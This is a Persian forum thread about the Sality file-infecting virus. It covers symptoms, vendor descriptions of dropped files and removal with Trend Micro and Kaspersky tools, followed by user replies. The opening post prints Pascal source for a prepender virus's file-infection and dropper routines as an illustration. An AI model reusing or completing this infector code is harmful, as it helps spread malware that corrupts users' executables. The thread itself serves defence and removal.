ویروس sality (سالیتی) و روش پاک کردن آن (Removal Sality)

سلام به همه .
این چند وقت خیلی از بچه ها در مورد این ویروس سوال پرسیدن گفتم بهتره یه پست بهش اختصاص بدیم تا همه بیان و مشکلاتشون رو بیان کنن.
ویروس sality یه Pe Appendه که این روزها خیلی شیوع پیدا کرده.این ویروس خودش رو به صورت یه درایور نصب میکنه(به گفته نود (IpFilterDriver (IP Traffic Filter Driver
تنها چیزی که من دیدم بعد از ویروس گرفتن این سرویس فعال میشه!!) بهمین خاطره که پروسزش رو نمیتونید ببینید تنها چیزی که میبینید اجرای همزمان یا رندوم واره پروسز های NotePad , Cmd , TelNet , Write , RegEdt32 هست!!!
ویروسهایی که خوشون رو به فایلهای exe میچسبونن تا اینجایی که من میدونم TrendMicro بهشون Pe Append میگه. وقتی شما می خواهید فایلی رو که به این ویروس مبتلا شده است رو اجرا کنید این ویروس خودش رو از فایل آلوده جدا و در مسیر های متفاوتی مثل WinDir یا Temp می ندازه (Drop) بعد فایل الوده رو اجرا میکنه طوری که انگار ویروسی در کار نبوده! برای این ویروس در سایتهای مختلف موارد متفاوتی گفته شده :

Tren Micro:

It drops the following files in the Windows system folder:

• vcmgcd32.dll - detected by Trend Micro as [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
• vcmgcd32.dl_ - compressed version of VCMGCD32.DLL

و

Symantec :

ay drop a .dll file the %System% or %Temp% folders. The following are some examples of the filenames:

• SYSLIB32.DLL
• OLEDSP32.DLL
• SYSDLL.DLL
• OLEMDB32.DLL

bitdefender:
Win32.Sality.M is a polymorphic file infector that affects PE executable files. When an infected executable has been run, it drops the following files:

%system%\vcmgcd32.dll
%system%\vcmgcd32.dl_

کد:

---

http://www.bitdefender.com/VIRUS-1000232-en--Win32.Sality.M.html

---

eset:
When executed the virus drops in folder %system%\drivers\ the following file:

%variable%.sys (5941 B)

%variable% stands for a random text.

کد:

---

http://www.eset.eu/buxus/generate_page.php?page_id=20180

---

برای فهم بهتر موضوع برا بچه های که کمی برنامه نویسی خوندن سورس پاسکال تابع Append و Drop ویروس Virus.Win32.Delf.b که یه pe append است رو در زیر گذاشتم : :27:

کد:

---

PROCEDURE Prepend(DestinationFileName:STRING);

VAR

DestinationFile    : FILE;

 

FileAttribute      : Integer;

 

DestinationFileSize : Longint;

 

Buf                : AnsiString;

 

BEGIN

 

TRY

 

FileAttribute:=GetFileAttributes(pAnsiChar(DestinationFileName));

 

SetFileAttributes(pAnsiChar(DestinationFileName), 80);

 

    {$I-}

 

AssignFile(DestinationFile,DestinationFileName);

 

FileMode:=2;

 

Reset(DestinationFile,1);

 

DestinationFileSize:=FileSize(DestinationFile);

 

SetLength(Buf,DestinationFileSize);

 

BlockRead(DestinationFile,Buf[1],DestinationFileSize);

 

IF Pos(VirusEndSignature,Buf)=0 THEN BEGIN

 

Seek(DestinationFile,0);

 

BlockWrite(DestinationFile,VirusBuffer[1],VirusSize);

 

BlockWrite(DestinationFile,VirusEndSignature[1],Length(VirusEndSignature));

 

BlockWrite(DestinationFile,Buf[1],DestinationFileSize);

 

CloseFile(DestinationFile);

 

END;

 

    {$I+}

 

SetFileAttributes(pAnsiChar(DestinationFileName), FileAttribute);

 

FINALLY

 

END;

   

END;

 

//----

 

PROCEDURE DropFile;

 

VAR

 

G : FILE;

 

S : STRING;

 

T : Longint;

 

BEGIN

 

{$I-}

 

T:=VirusPositon+Length(VirusEndSignature);

 

IF VirusPositon>0 THEN BEGIN

 

    // Working as  a classic prepender  if can not  execute the original file in

 

    // the memory.

 

IF(NOT IsNTBasedOS)OR(NOT CreateProcessEx(@VirusBuffer[T])) THEN BEGIN

 

TRY

 

S:=TempPath+ExtractFileName(ParamStr(0));

 

AssignFile(G,S);

 

Rewrite(G,1);

 

BlockWrite(G,VirusBuffer[T],Length(VirusBuffer)-T+1);

 

CloseFile(G);

 

WinExec(pChar(S+' '+CommandLineParameters),SW_SHOW);

 

EXCEPT

 

END;

 

END;

END;

  {$I+}

END;

---

ویروس sality مثل بقیه pe Append ها از این نحوه کد نویسی پیروی میکنه و خودش رو با حجم 56کیلو به exe های سیستم اضافه میکنه.
به گفته trendMicro این ویروس فایلهای

It infects files of the following type(s):

• .EXE
• .SCR

It avoids folders with the following strings:

• AHEAD
• SYSTEM

برگرفته از مسیر [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
و Symantec

 May infect executable files by prepending its code to the host file. However, not all the variants of this virus are able to spread in this way. Any infected files will be detected as [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] .

 May delete the files which have the following extensions when searching for files to infect:

• .vdb
• .avc
• .key

بر گرفته از مسیر http://www.symantec.com/security_response/writeup.jsp?docid=2006-011714-3948-99&tabid=2
تحت تاثیر قرار میده.
این ویروس به آنتی ویروس اجازه نصب سرویسش رو نمی ده که در نتیجه انتی ویروس نمی
تواند به درستی نصب گردد.

قبلا در راه حل مقابله با این ویروس گفته بودم هاردتون رو جدا کنید و OfficeScan از TrenMicro رو روی یه سیستم دیگه نصب کنید و جستجو کنید....
این ویروس مدل های متفاوتی داره که مدل جدیدش با اپدیت 8.2008 به گفته trendmicro حل میشه.
آقای مهندس الیاس ملکی معاف در مسیر
http://www.acs.ir/post-48.aspx
اطلاعات جالبی از این ویروس رو قرار داده اند اما بعضی چیزا مثل Autorun و پروسز های گفته شده رو من ندیدم!!
Avg انتی برای Sality انتشار داده که متاسفانه این مدلی که تو بحثمونه رو نمی تونه شناسایی و پاک کنه آخه خودم تست کردم.
اما امروز می خوام یه روش باحال از دوستم TrenMicroبگم.

پاک کردن ویروس Sality ( Remove sality )
روش اول (طولانی و جالب):
به مسیرهای زیر رفته و فایلها را دونلود کرده سپس Extract کنید.

نقل قول:

---

http://www.trendmicro.com/ftp/products/pattern/spyware/fixtool/SysClean-PE_SALITY.zip

---

کد:

---

http://www.trendmicro.com/download/viruspattern.asp

---

کد:

---

http://www.trendmicro.com/download/spywarepattern.asp

---

یه فایل به شکل lptNumber وجود داره که جلوش نوشته مال ویندوزه که number هم نگارش pattern فایلو نشون میده رو بردارید.
لینکه 3 به Pattern spayware اشاره میکنه که فایله ssapiptnNUM.zip (که num نگارش pattern رو نشون میده)رو باید دون کنید بعد از extract فایله ssapiptn.da5 رو SysClean-PE_SALITY\SysClean_PE_SALITY\system\sysclean rvhv nidn.
فایل اول یه برنامه اجرایی عالی از trendMicroست و فایل دوم که Pattern File برنامه اجرایی قبلیست و لیست کلیه ویروسهایی رو داره که تا اکنون توسط trendmicro شناخته شده و راه حل انها ارایه شده است، می باشد.
داخل فایل lptNUMBER.zip فایلی با نام lpt$vpnNUMBER وجود دارد که باید ان را در مسیر
SysClean-PE_SALITY\SysClean_PE_SALITY\system\sysclean
از فایل extract شده اول قرار دهید.
اکنون فایل fix.bat را اجرا کنید تا از قدرت trendMicro آگاه بشید.
اکنون شما در سیستمتون یه آنتی ویروس اپدیت TrendMicroبدون RealTime سرویس دارید.:31:


روش دوم (کوتاه و مختصر):

امروز دیدم که Sality Killer هم کسپر گذاشته.
راستی این لعنتی داره همش نگارش جدید بیرون میده که اگر SalityKiller قدیمی رو داشته باشین نمیتونین باهاش فایلهای خراب شده جدیدتون رو ترمرم کنید.

حتما باید نگارش جدید رو از مسیر زیر بردارید :

کد:

---

http://www.kaspersky.com/downloads/utils/salitykiller.zip

---

ه هر حال شما میتونید مستقیما بدون استفاده از TrendMicro و با Sality Killer هم اون از Exe هاتون Clean کنید.] موفق و پیروز باشید.

اینم برای ترمیم رجیستری شما

کد:

---

http://www.4shared.com/file/128162525/18d64721/MSH_KILL.html

---

هیچ کس هنوز سالیتی نگرفته!!!!!! D:

نقل قول:

---

هیچ کس هنوز سالیتی نگرفته!!!!!! D:

---

اتفاقا خیلی ها این مشکل رو داشتن و کسی هم نتونست جواب درستی بده

از دقت و حوصله شما خیلی متشکرم که مطالب مفید و دقیق توی این بخش می گذارید

از مدیر این بخش خواهش می کنم که این تاپیک رو بصورت مهم در بیارن یا اینکه یک بخش با عنوان " مقابله با

ویروسهای خاص" ( یا چیزی شبیه به این) اختصاص بدن و توی اون بخش راههای تخصصی برای پاک کردن

ویروسهای خاص مطرح بشه این موضوع رو توی بخش انجمن کاربران فعال هم مطرح می کنم

قربانت عزیز:40:
تو بانک ما (که ازش ن...دارم) این ویروس غوغا کرده!
خصوصا وقتی خودش رو به یه ویروس دیگه مثل کظم غیض و ... می چسبونه و همراه اونا تکثیر میشه.
آخه جالب بود خیلیا این ویروس رو گرفتن خودش نمی دونن اونوقت می رن یه جای اشتباه سوالو مطرح می کنن و چون همه چی رو نمی تونن قشنگ توضیح بدن بچه ها هم گمراه میشن و جواب اشتباه و ....:41:

این تاپیک به چه کسانی می تواند کمک کند، کسانی که:
1- هیچ گونه انتی ویروسی نمی توانند نصب کنن.
2- حجم exe های سیستمشان 56 کیلو اضافه شده است.
3- پروسز های NptePad , Cmd , TelNet , Write , RegEdt32 پشت صحنه به صورت راندوم در حال اجرا می یاشند.
4- کلیدی مثل HKCU\Software\MSH914 در رجیستریشان ایجاد شده که MSH نام کاربر فعلی ویندوز می باشد.
5- سایت کسپر و نودشون و بقیه انتی ها شون بلوکه شده.
6- و مواردی که اقای مهندس الیاسی در ادرس

کد:

---

http://www.acs.ir/post-48.aspx

---

ذکر نمودند.
موفق و پیروز باشید.:31:

منم همین مشکلو داشتم عزیزوباروش شما سیستمم راه افتاد ولی نمیدونم چرا فایلهایی که رو هاردم هست همچین اروری میدن

کد:

---

http://www.uplod.ir/download.php?file=490051

---

سلام ویروس کظم غیظ چه کاری میتونه بکنه

به نام خدا
سلام حدمت اساتید
من این مشکل را با nod و آپدیت دوماه پیش حل کردم و جالب این که با چند ورژن مختلف دیگه امتحان کردم نصب نشد
موفق باشید

فکر کنم کمن یه تاپیک در این مورد داشتم! یادم نیست کجاست.

برای سیستم خودم این اتفاق افتاد و تنها راه این بود که ویندوز رو عوش کنم و قبل از هرکاری از روی سیدی یه آنتی ویروس قوی نصب و آپدیت کنم و بعد اسکن.
خیلی جالب بود برای یه سیستم که دیروز اورده بودن پیشم همین مشکل پیش اومده بود و دست بر قضا! (غذا؟ قذا؟ قزا؟ غزا؟ قزا؟ غضا؟) آنتی ویروس هم نداشتم. و مجبور شدم مال خودش رو که کاسپر بود از روی هارد نصب کنم! و دقیقا ویروس هم به فایل اجرایی آنتی ویروس چسبیده بود. 5 بار ویندوز رو نصب کردم. آخرش هم مجبور شدم نورتون رو دانلود و با فلش نصب کنم که خوشبختانه موفق شدم. اما این آنتی ویروس خنگ همه فایل های اجرایی رو پاک کرد.

یه چیز جالب که متوجه شدم اینه که این ویروس قادر به چسبوندن خودش به فایل های اجرایی که پک شده باشن نیست. و دقیقا همین برنامه ها بودن که از اون سیستم باقی موندن.

Enter جان این تا اینجایی که من می دونم او این ویروس رو چندین بار رو چند کامپیوتر متفاوت(کامپیوتر خودم، پسر خوالم دوستموو..)
تستیدم این Error رو ندیدم.
پیشنهاد من نصب یه Windows Installere.
نورتن و نود رو که تستیدم نمی تونن ویروس رو از فایلها Clean کنند.

پیچرجان من قبل ازاینکه سیستمم ویروسی بشه این Error رو ندیده بودم الان اومدم ویندوز رو عوض کردم بازم همین مشکل رو داشت اگه امکانش هست یه تحقیقی کن ببین چیکارباید بکنم دمت گرم.